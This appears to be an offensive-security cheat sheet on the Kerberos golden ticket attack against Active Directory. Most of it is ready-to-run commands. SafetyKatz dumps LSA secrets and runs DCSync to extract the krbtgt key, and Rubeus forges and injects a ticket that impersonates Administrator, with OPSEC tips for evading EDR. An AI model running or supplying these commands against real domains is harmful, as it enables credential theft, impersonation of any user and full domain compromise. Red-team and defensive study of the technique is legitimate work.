# golden-ticket

A golden ticket is signed and encrypted by the secrets of krbtgt account which makes it a valid TGT. The krbtgt user secrets (use AES keys for OPSEC) can be used to impersonate any user with any privileges from even a non-domain machine.

## Methodology

1. Retrieve the AES-256 key of the `krbtgt` account.
2. Forge and inject the ticket.
3. Impersonate any user.

## Binaries

> \[!INFO] Remember to follow the Binaries methodology

## SafetyKatz

**Retrieve the AES-256 key of the `krbtgt` account:**

```batchfile
SafetyKatz.exe '"lsadump::lsa /patch"'
SafetyKatz.exe '"lsadump::dcsync /user:contoso\krbtgt"'
```

## Rubeus

**Forge a golden ticket with similar attributes to a normal TGT:**

```
# With an NTLM hash (Usually flagged by EDRs)
Rubeus.exe golden 
/rc4:32ED87BDB5FDC5E9CBA88547376818D4 /sid:S-1-5-21-210670787-2521448726-163245708 /ldap /user:Administrator /printcmd /ptt

# With an AES-256 key (Admin cmd required)
Rubeus.exe golden 
/aes256:5e3d2096abb01469a3b0350962b0c65cedbbc611c5eac6f3ef6fc1ffa58cacd5 /sid:S-1-5-21-210670787-2521448726-163245708 /ldap /user:Administrator /printcmd /ptt
```